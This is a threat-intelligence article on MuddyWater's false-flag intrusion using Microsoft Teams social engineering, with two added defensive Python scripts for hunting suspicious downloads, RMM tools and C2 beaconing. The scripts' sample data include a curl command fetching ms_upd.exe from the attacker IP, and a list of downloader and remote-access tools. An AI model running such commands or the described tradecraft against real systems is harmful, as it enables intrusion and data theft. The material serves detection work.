MuddyWater Uses Microsoft Teams to Steal Data in False Flag Attacks

An Iranian government-sponsored hacking group known as MuddyWater (also tracked as Mango Sandstorm, Seedworm, and Static Kitten) has been linked to a ransomware attack that is assessed to be a “false flag” operation.
The attack, detected by Rapid7 in early 2026, used social engineering over Microsoft Teams to kick off the infection chain. Although the incident initially appeared to be the work of a ransomware-as-a-service (RaaS) affiliate operating under the Chaos brand, the evidence points to a targeted, state-directed intrusion dressed up as an opportunistic criminal operation.
“This campaign was characterized by a high-impact social engineering phase conducted over Microsoft Teams, where attackers used screen sharing to gain access to information and use multi-factor authentication (MFA),” Rapid7 said in a report shared with The Hacker News.
“Once inside, the group bypassed the traditional ransomware workflow, abandoning file encryption in favor of data extraction and long-term persistence with remote management tools like DWAgent.”
The findings indicate that MuddyWater is trying to muddy attribution by relying heavily on off-the-shelf tools sold in the cybercriminal underground. This shift has also been documented by Ctrl-Alt-Intel, Broadcom, Check Point, and JUMPSEC in recent months, with those reports highlighting the adversary’s use of CastleRAT and Tsundere.
As noted, this is not the first time MuddyWater has carried out a ransomware attack. In September 2020, the threat actor was said to have run a campaign targeting prominent Israeli organizations with a loader called PowGoop that dropped a variant of the destructive Thanos ransomware.
Then in 2023, Microsoft revealed that the hacking group had teamed up with DEV-1084, a threat actor known for using the DarkBit persona, to carry out a destructive attack disguised as a ransomware operation. As recently as October 2025, the threat actor is believed to have used the Qilin ransomware against an Israeli government hospital.
“In this case, the emerging picture is that the attackers are likely Iranian operatives working within the cybercrime ecosystem, using a type of ransomware crime and methods tied to the full extortion market, while serving Iran’s strategic objectives,” Check Point noted back in March.
“The use of Qilin, and participation in its affiliate program, probably serves not only as cover and plausible deniability, but also as an effective method of operation, especially since the previous attacks seem to have increased security measures and vigilance by the Israeli authorities.”
Chaos is a RaaS group that surfaced in early 2025. Known for its double extortion model, the threat actor has advertised its affiliate program on cybercrime forums such as RAMP and RehubCom.
Attacks mounted by e-crime affiliates combine email and Teams-based phishing, often impersonating IT support staff, to trick victims into installing remote access tools such as Microsoft Quick Assist, then use that foothold to move through the victim’s environment and deploy the ransomware.
“This group has also demonstrated triple extortion by threatening attacks on the victim’s infrastructure,” said Rapid7. “These capabilities are reportedly offered to affiliates as part of its integrated services, which represents a notable feature of its RaaS model. In addition, Chaos has been observed engaging in quadruple extortion, including threats to contact customers or competitors to increase pressure on victims.”

As of late March 2026, Chaos has claimed 36 victims on its data leak site, most of them located in the U.S. Construction, manufacturing, and business services are among the most prominent sectors targeted by the group.
In the intrusion analyzed by Rapid7, the threat actor is said to have initiated external chat requests through Teams to reach employees and gain initial access through screen-sharing sessions, then used the compromised user accounts to conduct reconnaissance, establish persistence with tools such as DWAgent and AnyDesk, pivot within the network, and exfiltrate data. The victim is then contacted via email to negotiate a ransom.
“While connected, the TA [threat actor] ran basic discovery commands, accessed files related to the victim’s VPN configuration, and instructed users to enter their credentials into locally created text files,” Rapid7 explained. “In at least one instance, the TA also used a remote administration tool (AnyDesk) to further facilitate access.”
The threat actor was also observed using an RDP session to download an executable (“ms_upd.exe”) from an external server (“172.86.126[.]208”) with the curl tool. Once executed, the binary kicks off a multi-stage infection chain that delivers the remaining malicious components.
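The chain described above (a Teams-initiated session, credentials typed into local text files, a curl download of an executable from a bare IP address over an RDP session, and RMM tools for persistence) leaves host telemetry that a detection engineer can hunt on. The following Python script is an added example and is not code from Rapid7 or from the article: it runs three simple rules over constructed Sysmon-style process-creation events (the events, field names, RMM allowlist and install paths are assumptions) and returns the hits.

```python
"""Hunt constructed process-creation events for the tradecraft described above.

Added example; the events below are constructed for illustration, not real telemetry.
"""
import ipaddress
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Living-off-the-land downloaders worth inspecting when their URL host is a bare IP.
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "wget.exe", "powershell.exe"}

# Remote-management tools named in the article (DWAgent, AnyDesk) plus Quick Assist.
RMM_TOOLS = {"dwagent.exe", "anydesk.exe", "quickassist.exe"}
APPROVED_RMM = set()  # assumption: this environment sanctions no RMM tool at all

# Code-signing subject reported for ms_upd.exe; extend with your own intelligence.
BAD_SIGNERS = {"donald gay"}


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_ip_literal(host):
    """True when the URL host is an IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def download_from_ip(event):
    """Rule 1: a downloader fetching from a URL whose host is an IP address."""
    if basename(event["image"]) not in DOWNLOADERS:
        return None
    for url in URL_RE.findall(event["cmd"]):
        host = urlparse(url).hostname or ""
        if is_ip_literal(host):
            return url
    return None


def unapproved_rmm(event):
    """Rule 2: an RMM binary that is not on the approved list."""
    name = basename(event["image"])
    return name if name in RMM_TOOLS and name not in APPROVED_RMM else None


def denylisted_signer(event):
    """Rule 3: a binary signed by a certificate subject on the denylist."""
    signer = event.get("signer", "").strip().lower()
    return signer if signer in BAD_SIGNERS else None


RULES = [
    ("download-from-ip-literal", download_from_ip),
    ("unapproved-rmm", unapproved_rmm),
    ("denylisted-signer", denylisted_signer),
]


def triage(events):
    """Apply every rule to every event; return one hit per (event, rule) match."""
    hits = []
    for event in events:
        for rule_name, rule in RULES:
            detail = rule(event)
            if detail:
                hits.append({"ts": event["ts"], "user": event["user"],
                             "rule": rule_name, "detail": detail})
    return hits


# Constructed sample events (Sysmon event ID 1 shape, simplified; paths are assumed).
SAMPLE_EVENTS = [
    {"ts": "2026-03-10T09:12:03Z", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\curl.exe",
     "cmd": "curl.exe -o C:\\Users\\Public\\ms_upd.exe http://172.86.126.208/ms_upd.exe",
     "signer": "Microsoft Windows"},
    {"ts": "2026-03-10T09:12:40Z", "user": "CORP\\jdoe",
     "image": "C:\\Users\\Public\\ms_upd.exe", "cmd": "ms_upd.exe",
     "signer": "Donald Gay"},
    {"ts": "2026-03-10T09:20:15Z", "user": "CORP\\jdoe",
     "image": "C:\\Program Files\\DWAgent\\runtime\\dwagent.exe",
     "cmd": "dwagent.exe -service", "signer": ""},
    {"ts": "2026-03-10T09:25:00Z", "user": "CORP\\asmith",
     "image": "C:\\Windows\\System32\\curl.exe",
     "cmd": "curl.exe https://www.example.com/update.json",
     "signer": "Microsoft Windows"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The first three events produce one hit each (the IP-literal download, the denylisted signer, the unapproved RMM binary); the fourth, a curl fetch from a hostname, is deliberately left unflagged because downloads by name are too common to alert on without further context. A signer denylist catches only reuse of a known certificate; the more durable control is requiring that anything signed by an unfamiliar subject be reviewed before it runs.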
A brief description of the malware families is below –
- ms_upd.exe (also known as Stagecomp), which collects system information and contacts the command-and-control (C2) server to download the next-stage payloads (game.exe, WebView2Loader.dll, and visualwincomp.txt).
- game.exe (also known as Darkcomp), a remote access trojan (RAT) that masquerades as a legitimate Microsoft WebView2 program. It is a trojanized build of Microsoft’s official WebView2APISample project.
- WebView2Loader.dll, the legitimate WebView2 loader DLL, downloaded by ms_upd.exe alongside the RAT. Microsoft Edge WebView2 is the component Windows applications use to embed web content.
- visualwincomp.txt, the encrypted configuration from which the RAT obtains its C2 information.
The RAT connects to the C2 server and enters an infinite loop, polling for new commands every 60 seconds. Its command set lets it run shell commands or PowerShell scripts, perform file operations, and spawn an interactive cmd.exe or PowerShell shell.
The link to MuddyWater comes from the code signing certificate issued in the name “Donald Gay” that was used to sign “ms_upd.exe.” The same certificate was previously used by the threat actor to sign other malware, including a CastleLoader downloader dubbed Fakeset.
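A RAT that polls its C2 on a fixed 60-second timer produces a very regular connection cadence, and that regularity is what the following Python script looks for. It is an added example, not Rapid7’s or the malware’s code: it groups constructed outbound-connection records (the flows, hosts, ports and thresholds are assumptions) by source, destination and port, computes the inter-arrival times and flags groups whose timing barely varies.

```python
"""Spot fixed-interval beaconing in outbound connection logs.

Added example; the flows below are constructed, not captured traffic.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_ts(text):
    return datetime.strptime(text, TS_FMT).replace(tzinfo=timezone.utc)


def beacon_candidates(flows, min_conns=5, max_jitter=0.10):
    """Return (src, dst, dport) groups whose connections recur at a near-fixed interval.

    max_jitter bounds the coefficient of variation (stdev / mean) of the
    inter-arrival times: a 60 s polling loop with a second or two of scheduling
    noise stays well under 0.10, while interactive browsing to one host is far above it.
    """
    groups = defaultdict(list)
    for flow in flows:
        groups[(flow["src"], flow["dst"], flow["dport"])].append(parse_ts(flow["ts"]))

    candidates = []
    for (src, dst, dport), times in groups.items():
        if len(times) < min_conns:
            continue
        times.sort()
        deltas = [(later - earlier).total_seconds()
                  for earlier, later in zip(times, times[1:])]
        interval = mean(deltas)
        if interval <= 0:
            continue
        jitter = pstdev(deltas) / interval
        if jitter <= max_jitter:
            candidates.append({"src": src, "dst": dst, "dport": dport,
                               "count": len(times),
                               "interval_s": round(interval, 1),
                               "jitter": round(jitter, 3)})
    return candidates


def make_flows(src, dst, dport, offsets_s, start):
    """Build constructed flow records at the given second offsets from start."""
    return [{"ts": (start + timedelta(seconds=o)).strftime(TS_FMT),
             "src": src, "dst": dst, "dport": dport} for o in offsets_s]


START = datetime(2026, 3, 10, 9, 15, 0, tzinfo=timezone.utc)

# Constructed sample: one host polling a C2 roughly every 60 s, the same host
# browsing a web server at human-driven intervals, and a group too small to judge.
SAMPLE_FLOWS = (
    make_flows("10.0.0.5", "203.0.113.7", 443, [0, 61, 119, 180, 242, 300, 359, 421], START)
    + make_flows("10.0.0.5", "198.51.100.9", 443, [0, 7, 95, 130, 400, 412], START)
    + make_flows("10.0.0.8", "198.51.100.9", 443, [0, 60], START)
)

if __name__ == "__main__":
    for hit in beacon_candidates(SAMPLE_FLOWS):
        print(hit)
```

Only the first group is reported, with an interval of about 60 s and a jitter near 0.03. Plenty of legitimate software (NTP, mail clients, monitoring agents, update checkers) also polls on a fixed timer, so the output is a candidate list to allowlist against rather than an alert on its own, and a RAT that randomizes its sleep would need a wider tolerance or a different feature such as request size.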

The findings underscore the growing convergence of state-sponsored intrusion activity and commoditized cybercrime tooling, a blend that obscures attribution and delays an appropriate defensive response.
“The use of a RaaS framework in this context may allow an actor to blur the distinction between state-sponsored activity and financially motivated cybercrime, making it difficult to classify,” Rapid7 said. “Additionally, the deployment of extortion and negotiation tooling may focus defensive efforts on the immediate impact, potentially delaying identification of the underlying persistence mechanisms established through remote access tools such as DWAgent or AnyDesk.”
“Notably, the apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a departure from typical ransomware behavior. This discrepancy may indicate that the ransomware component served primarily as a means of facilitation or obfuscation, rather than as the primary purpose of the intrusion.”
The development comes as Hunt.io disclosed details of an Iranian-nexus operation targeting Omani government agencies that exfiltrated more than 26,000 Justice Department user records, court case data, committee decisions, and SAM and SYSTEM registry hives.
“An open directory at 172.86.76[.]127, a RouterHosting VPS in the United Arab Emirates, revealed an active hacking campaign against the Omani government, with the toolkit, C2 code, session logs, and exfiltrated data all exposed,” the company said.
The discovery also coincides with the ongoing activity of pro-Iran hacktivist groups such as Handala Hack, which has claimed to have leaked the information of about 400 U.S. Navy personnel in the Persian Gulf and to have attacked the Port of Fujairah in the United Arab Emirates, gaining access to its internal systems and leaking about 11, customs-related documents.
“Last month, we documented a significant increase in Iranian-related cyber activity – surveillance via hijacked cameras, the leak of thousands of sensitive documents from a former Israeli military commander, and a moderate increase in attack volume across the region. We said there was a possibility of further escalation,” said Sergey Shykevich, group manager at Check Point Research.
“The claims about the Fujairah port attack, if confirmed, mark an escalation. What has changed is the nature of the threat: this is no longer about intelligence gathering or public shaming. Stolen port infrastructure data was allegedly used to enable missile targeting.”
“The cyber and kinetic domains are now clearly connected. This campaign is not slowing down. Every quiet period so far has been followed by intensified cyber activity – and what we are seeing now is the clearest reflection of that pattern yet.”